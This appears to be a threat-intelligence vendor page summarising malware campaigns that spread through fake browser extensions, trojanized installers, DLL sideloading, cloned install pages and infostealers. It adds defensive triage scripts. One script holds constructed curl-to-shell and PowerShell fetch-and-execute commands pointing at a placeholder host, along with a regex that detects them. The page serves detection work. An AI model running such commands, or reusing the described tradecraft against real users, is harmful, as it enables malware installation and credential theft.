Mallory

Social-Engineering Malware Campaigns Targeting End Users via Browser Stores and Fake Installers

Tags: social-engineering, Malwarebytes, browser extensions, installers, affiliate-link hijacking, clipboard hijacker, infostealers, credential theft, wallet theft, CoreMessaging.dll, script injection, DLL sideloading, trojanized ZIP, Firefox, Chrome
Updated January 19, 2026 at 09:04 AM · 3 sources

Multiple active social-engineering-driven malware operations are targeting end users through trusted distribution channels. One campaign, dubbed GhostPoster, distributed 17 malicious browser extensions across Chrome, Firefox, and Edge with 840,000+ installs, using legitimate-sounding names (e.g., “Google Translate in Right Click,” “Youtube Download,” “Ads Block Ultimate”) and evading store reviews for years. The extensions used steganography to hide code in PNGs, then extracted payloads to contact attacker infrastructure, enabling credential/data theft, tracking, affiliate-link hijacking, script injection, and HTTP header manipulation to weaken protections.

Separately, threat actors are impersonating Malwarebytes via trojanized ZIP “installers” (e.g., malwarebytes-windows-github-io-X.X.X.zip) and using DLL sideloading—pairing a legitimate EXE with a malicious CoreMessaging.dll—to execute infostealers; reporting highlighted a campaign fingerprint via behash 4acaac53c8340a8c236c91e68244e6cb and distinctive DLL strings used for infrastructure mapping. A different operation identified by CloudSEK involves “RedLineCyber” masquerading as an affiliate of “RedLine Solutions” to build credibility inside private Discord communities and deliver a Python-based clipboard hijacker (often Pro.exe / peeek.exe) aimed at cryptocurrency wallet theft, relying on long-term grooming of high-value targets rather than broad phishing.

Related Stories

Malware Campaigns Using Social Engineering to Deliver Proxyware, RATs, and Ransomware


Multiple active malware campaigns are using **social engineering** and **trojanized content** to compromise Windows systems, with lures ranging from pirated software downloads to business and shipping documents. AhnLab reported a “proxyjacking” operation attributed to **Larva-25012** that distributes fake installers (notably a trojanized *Notepad++* package) via cracked-software sites; the `Setup.zip` bundle includes a legitimate `Setup.exe` plus a malicious sideloaded DLL (`TextShaping.dll`) that decrypts and installs **DPLoader** for persistent command retrieval and follow-on payload delivery. The malware also tampers with defenses by changing Microsoft Defender settings (e.g., exclusions, reduced notifications, and blocking sample submission) to reduce detection while monetizing victims’ bandwidth through installed **proxyware**. Separately, FortiGuard Labs described a Russia-focused, multi-stage intrusion chain that abuses trusted services (**GitHub** and **Dropbox**) for payload hosting and weaponizes **Defendnot** (a Windows Security Center trust-model research tool) to disable **Microsoft Defender** before deploying a ransomware payload. Fortinet also documented phishing campaigns using weaponized shipping-themed Word documents to deliver **Remcos RAT**, including fileless execution behavior and exploitation of `CVE-2017-11882` (Microsoft Equation Editor) via remotely fetched templates. These campaigns reinforce the operational risk from user-driven execution paths (pirated installers and document lures), “living off the land” techniques, and defense evasion through both policy tampering and security tooling abuse.
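Both the fake Malwarebytes ZIP above (legitimate EXE beside a malicious CoreMessaging.dll) and the trojanized Notepad++ `Setup.zip` (legitimate `Setup.exe` beside `TextShaping.dll`) share the same shape: an archive that pairs a signed executable with a sideload-able DLL in the same directory. The triage script below is an added example, not code from Mallory, Malwarebytes or AhnLab. It builds a few constructed in-memory ZIPs with placeholder bytes (not real binaries) and flags the EXE/DLL pairing and the dashed-hostname naming pattern the reporting describes; the DLL watchlist contains only the two names given on this page and is an assumption to be extended from your own telemetry.

```python
import io
import posixpath
import zipfile

# DLL names this page reports being sideloaded next to a legitimate EXE
# (CoreMessaging.dll in the fake Malwarebytes ZIP, TextShaping.dll in the
# trojanized Notepad++ Setup.zip). Assumed starting watchlist, not exhaustive.
SIDELOAD_DLL_WATCHLIST = {"coremessaging.dll", "textshaping.dll"}


def find_sideload_pairs(member_names):
    """Return (exe, dll) pairs where a watch-listed DLL sits in the same
    archive directory as an EXE, the classic sideloading layout."""
    by_dir = {}
    for name in member_names:
        if name.endswith("/"):
            continue  # directory entry, nothing to pair
        d, base = posixpath.split(name)
        by_dir.setdefault(d, []).append(base)
    pairs = []
    for d, files in by_dir.items():
        exes = [f for f in files if f.lower().endswith(".exe")]
        dlls = [f for f in files if f.lower() in SIDELOAD_DLL_WATCHLIST]
        for exe in exes:
            for dll in dlls:
                pairs.append((posixpath.join(d, exe), posixpath.join(d, dll)))
    return pairs


def triage_archive(archive_name, zip_bytes):
    """Triage a downloaded ZIP 'installer'; returns human-readable findings."""
    findings = []
    # Naming heuristic from the page: fake vendor downloads named after a
    # dashed hostname, e.g. malwarebytes-windows-github-io-X.X.X.zip.
    if "github-io" in archive_name.lower():
        findings.append(f"archive name embeds a dashed hostname: {archive_name}")
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    for exe, dll in find_sideload_pairs(names):
        findings.append(f"possible DLL sideloading: {exe} next to {dll}")
    return findings


def build_zip(entries):
    """Build an in-memory ZIP from {member_name: bytes}; used only to construct samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
    return buf.getvalue()


# Constructed samples: placeholder bytes stand in for the real files.
FAKE_MALWAREBYTES = build_zip({
    "Malwarebytes/Malwarebytes.exe": b"MZ placeholder",
    "Malwarebytes/CoreMessaging.dll": b"MZ placeholder",
})
FAKE_NOTEPADPP = build_zip({
    "Setup.exe": b"MZ placeholder",
    "TextShaping.dll": b"MZ placeholder",
})
BENIGN = build_zip({
    "tool/tool.exe": b"MZ placeholder",
    "tool/README.txt": b"hello",
})

if __name__ == "__main__":
    samples = [
        ("malwarebytes-windows-github-io-X.X.X.zip", FAKE_MALWAREBYTES),
        ("Setup.zip", FAKE_NOTEPADPP),
        ("tool.zip", BENIGN),
    ]
    for name, data in samples:
        print(name, triage_archive(name, data) or ["no findings"])
```

A hit is a triage lead, not a verdict: legitimate packages can ship a DLL with one of these names, so confirm by checking the DLL's signature and hash against the vendor's release before blocking.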

1 month ago
Social-engineering malware delivery via trusted installation and download paths


Security researchers reported two active/feasible malware-delivery patterns that abuse user trust in “normal” software acquisition flows rather than exploiting a specific browser or OS vulnerability. LayerX demonstrated a proof-of-concept Chrome add-on (*Totally Innocent Extension*) that can **silently modify executables as they are downloaded**—including from legitimate vendor sites—by appending attacker-controlled code without breaking the original application or requiring additional extension permissions, enabling follow-on outcomes such as persistence, lateral movement, and data theft. The researchers said the technique highlights gaps in browser extension security controls; Google and Mozilla did not acknowledge it as a product issue, with Google indicating social-engineering-driven intrusions fall outside its browser threat model. Separately, Push Security documented **InstallFix**, a new variant of the ClickFix social-engineering technique, where attackers clone installation pages for popular CLI tools and replace the install steps with malicious “copy/paste” commands (e.g., `curl`-to-shell patterns) that fetch payloads from attacker infrastructure. A noted example used a cloned *Claude Code* (Anthropic) CLI install page that preserved legitimate branding and redirected most links back to the real site, while only the macOS/Windows install instructions delivered malware; the pages were promoted via **Google Ads malvertising** for searches like “Claude Code install,” increasing the likelihood of developer and non-developer victims executing the malicious commands.
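The InstallFix tell described above is that the cloned page keeps the vendor's branding and links but its copy/paste install command fetches from attacker infrastructure. A pipe-to-shell command is therefore not suspicious on its own (many real CLI installers use one); what matters is whether the host in the fetched URL belongs to the vendor. The audit function below is an added example, not code from Push Security or any vendor, and the hosts (`example.com` as the tool's real site, `updates-example.net` as the off-site host) are constructed placeholders.

```python
import re
from urllib.parse import urlparse

# One fetch-and-execute command: a downloader, a URL, then a pipe into a
# shell or PowerShell's Invoke-Expression. Stops at newlines so multi-line
# instruction blocks yield one finding per command.
PIPE_TO_SHELL = re.compile(
    r"\b(?:curl|wget|iwr|irm|Invoke-WebRequest|Invoke-RestMethod)\b[^|\n]*?"
    r"(?P<url>https?://[^\s\"'|)]+)[^|\n]*"
    r"\|\s*(?P<elev>sudo\s+)?(?P<shell>bash|sh|zsh|iex|Invoke-Expression|powershell)\b",
    re.IGNORECASE,
)


def audit_install_instructions(text, expected_hosts):
    """Return one finding per pipe-to-shell command in `text`.

    Each finding records the host the command fetches from and whether that
    host is outside the page's expected host set; an off-site fetch on an
    otherwise legitimate-looking install page is the InstallFix indicator.
    """
    expected = {h.lower() for h in expected_hosts}
    findings = []
    for m in PIPE_TO_SHELL.finditer(text):
        host = (urlparse(m.group("url")).hostname or "").lower()
        findings.append({
            "command": m.group(0).strip(),
            "host": host,
            "off_site": host not in expected,
            "elevated": m.group("elev") is not None,  # asks for sudo as well
        })
    return findings


# Constructed samples: the vendor's own one-liner versus a cloned page
# whose macOS and Windows steps were swapped for off-site commands.
LEGIT_PAGE = "curl -fsSL https://example.com/install.sh | bash"
CLONED_PAGE = """
# Install on macOS
curl -fsSL https://updates-example.net/install.sh | sudo bash
# Install on Windows (PowerShell)
irm https://updates-example.net/install.ps1 | iex
"""

if __name__ == "__main__":
    for label, page in (("legit", LEGIT_PAGE), ("cloned", CLONED_PAGE)):
        for f in audit_install_instructions(page, ["example.com"]):
            print(label, f)
```

In practice the expected host set comes from the page's own canonical link or the domain you navigated to, so a command that fetches from anywhere else is flagged even when the rest of the page is a faithful copy.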

1 week ago
Credential-Theft Malware Campaigns Targeting Windows via Social Engineering and Trusted Services


Multiple reports describe **active malware campaigns targeting Windows users** with a focus on **credential, session, and wallet theft** delivered through social engineering and abuse of legitimate services. **CharlieKirk Grabber**, a Python infostealer packaged with *PyInstaller*, is distributed via phishing, cracked software, cheats, and social-media lures; it kills browser processes (via `TASKKILL`) to access credential stores, collects passwords/cookies/autofill/Wi‑Fi data, zips the loot, uploads it to *GoFile*, and relays the download link to operators via **Discord webhooks** or **Telegram bots**. Separately, attackers are buying **Facebook ads** impersonating Microsoft to drive victims to cloned Windows 11 download pages on lookalike domains (e.g., `ms-25h2-update[.]pro`), delivering a malicious installer that steals saved passwords, browser sessions, and **cryptocurrency wallet** data; the campaign uses **geofencing/sandbox evasion** to show benign content to data-center IPs while serving malware to likely end users. Other contemporaneous activity highlights broader Windows-targeted intrusion tradecraft and adjacent threats. FortiGuard Labs reported **Winos 4.0 (ValleyRat)** phishing campaigns in Taiwan using tax and e-invoice lures, with delivery chains including malicious **LNK** downloaders, **DLL sideloading**, and **BYOVD** using the vulnerable driver `wsftprm.sys`, supported by rapidly rotating domains and cloud hosting. In LATAM, a fake bank-receipt lure delivers **XWorm v5.6** via a `.pdf.js` double-extension WSH dropper that uses junk-padding and Unicode obfuscation, then reconstructs and runs PowerShell (spawned via WMI) and abuses trusted hosting (e.g., Cloudinary) for later stages—enabling credential theft and potential ransomware follow-on. 
Additional reporting covered a USB-propagating **Monero cryptomining** operation capable of crossing air-gapped environments, a new Linux **SysUpdate** variant with encrypted C2 traffic (and a Unicorn Engine-based decryption approach developed during DFIR), and the **Foxveil** loader abusing **Cloudflare Pages, Netlify, and Discord** to stage shellcode and persist via services or *SysWOW64* masquerading—these are separate threats but reinforce the trend of attackers blending into trusted infrastructure and common user workflows.
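The XWorm dropper above combines three things a mail or download gateway can score without executing anything: a `.pdf.js` double extension (looks like a document, runs as a WSH script), junk padding, and Unicode obfuscation of the strings that reconstruct the PowerShell stage. The triage below is an added example, not code from FortiGuard or any vendor; the thresholds, the extension lists and the `winmgmts:`/`powershell` keyword pair (assumed as the WSH-via-WMI spawn indicator) are assumptions to calibrate against your own samples. The sample script is constructed and inert: it only contains a string literal and a comment block.

```python
import re

# Extensions a lure pretends to be, and WSH-executable extensions it really is.
DOCUMENT_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "jpg", "jpeg", "png", "txt"}
WSH_EXTS = {"js", "jse", "vbs", "vbe", "wsf", "wsh", "hta"}
UNICODE_ESCAPE = re.compile(r"\\u[0-9a-fA-F]{4}")


def double_extension(name):
    """('pdf', 'js') for 'receipt.pdf.js': a document extension followed by
    a WSH script extension. None for single or non-script extensions."""
    parts = name.lower().rsplit(".", 2)
    if len(parts) == 3 and parts[1] in DOCUMENT_EXTS and parts[2] in WSH_EXTS:
        return parts[1], parts[2]
    return None


def junk_ratio(script):
    """Fraction of lines carrying no code (blank or comment-only): padding signal."""
    lines = script.splitlines()
    if not lines:
        return 0.0
    junk = sum(1 for ln in lines
               if not ln.strip() or ln.strip().startswith(("//", "'", "/*", "*")))
    return junk / len(lines)


def unicode_obfuscation_ratio(script):
    """Share of characters that are raw non-ASCII or part of \\uXXXX escapes."""
    if not script:
        return 0.0
    escaped = sum(len(m.group(0)) for m in UNICODE_ESCAPE.finditer(script))
    raw = sum(1 for ch in script if ord(ch) > 127)
    return (escaped + raw) / len(script)


def deobfuscate_unicode(script):
    """Resolve \\uXXXX escapes so keyword matching sees the real strings."""
    return UNICODE_ESCAPE.sub(lambda m: chr(int(m.group(0)[2:], 16)), script)


def triage_wsh_dropper(name, script, junk_threshold=0.5, unicode_threshold=0.05):
    """Score a filename plus script body; returns findings in a fixed order."""
    findings = []
    de = double_extension(name)
    if de:
        findings.append(f"double extension: looks like .{de[0]} but runs as .{de[1]}")
    jr = junk_ratio(script)
    if jr >= junk_threshold:
        findings.append(f"junk padding: {jr:.0%} of lines are blank or comments")
    ur = unicode_obfuscation_ratio(script)
    if ur >= unicode_threshold:
        findings.append(f"unicode obfuscation: {ur:.1%} of characters escaped or non-ASCII")
    low = deobfuscate_unicode(script).lower()
    if "winmgmts:" in low and "powershell" in low:  # assumed WMI + PowerShell indicator
        findings.append("WMI process spawn with PowerShell referenced")
    return findings


# Constructed sample: six padding comments, two blank lines, a WMI moniker,
# and the word "powershell" written entirely as \u escapes. Nothing executes.
SAMPLE_NAME = "comprobante.pdf.js"
SAMPLE_SCRIPT = "\n".join(
    ["// " + "x" * 40] * 6
    + ["", ""]
    + ['var w = GetObject("winmgmts:");',
       'var c = "\\u0070\\u006f\\u0077\\u0065\\u0072\\u0073\\u0068\\u0065\\u006c\\u006c";']
)
BENIGN_SCRIPT = "function add(a, b) { return a + b; }\nadd(1, 2);"

if __name__ == "__main__":
    print(SAMPLE_NAME, triage_wsh_dropper(SAMPLE_NAME, SAMPLE_SCRIPT))
    print("helper.js", triage_wsh_dropper("helper.js", BENIGN_SCRIPT))
```

Any single signal has benign explanations (minified libraries use `\u` escapes, generated code is comment-heavy), which is why the double extension is the anchor finding and the others raise the score rather than decide it.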

3 weeks ago

Get Ahead of Threats Like This

Mallory continuously monitors global threat intelligence and correlates it with your attack surface. Know if you're exposed — before adversaries strike.